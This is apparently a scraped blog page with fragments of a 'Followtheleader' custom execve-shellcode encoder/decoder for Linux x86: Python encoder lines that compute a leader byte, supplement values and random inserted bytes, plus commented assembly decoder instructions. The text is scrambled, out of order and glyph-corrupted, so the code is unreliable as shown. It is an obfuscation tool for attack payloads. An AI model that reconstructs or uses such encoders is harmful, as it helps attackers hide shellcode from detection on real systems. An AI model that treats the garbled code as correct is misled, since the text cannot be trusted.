![]() Shl eax, 28 shift left 28 bits of EAX which contains the value of Leader on al Shr dl, 4 Keep only the 4 high bits of LEADER to DL (if Leader=ac then DL=a) Mov dl, byte Put the LEADER byte to EDX (DL) Mul ecx This instruction will cause both EAX and EDX to become zero Lea edi, Load effective address of what is contained on EDI Pop esi Address of EncodedShellcode to ESI Description: Followtheleader custom insertion Encoder, Linux Intel/x86 Print ' LEADER BYTE :decimal(%d), HEX(0x%x)' %(int(sys.argv),leader) InsertByte = hex(random.randint(1,255)) # Put a Random byte Try again!!!'Įncoded += xxx # Put the xxx afterwards Xxx = hex(int(abs(subfs)) + int(rev_suplx,16))Įlif xxx = '0x0': # Check if ZERO byte was encoded Rev_suplx = hex(suplX) # REVERT the bytes of SUPPLEMENT (ae -> ea) ![]() SuplX = 255 - Dec_hopcode # CALCULATE the SUPPLEMENT Hopcode = '%02x' %x # KEEP only the HEX value of opcodeĭec_hopcode = int(hopcode, 16) # CALCULATE the DECIMAL value of opcode If LEADER = AF ->sb=FĮncoded += hex(leader) # FIRST byte the LEADERįor x in bytearray(shellcode): # READ every Instruction as BYTE Sb = int(hex(leader),16) # Split the LEADER. Print 'LEADER is any integer between 17-255'įb = int(hex(leader),16) # Split the LEADER. Print 'Script must run as: python xxx.py LEADER' # Description: Custom execve-shellcode encoder based on a given random byte which is used to encode the execve shellcode Linux/x86 - Followtheleader custom execve-shellcode Encoder/Decoder - 136 bytesįollowtheleader custom execve-shellcode Encoder/Decoder - Linux Intel/x86Ī)Python script.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |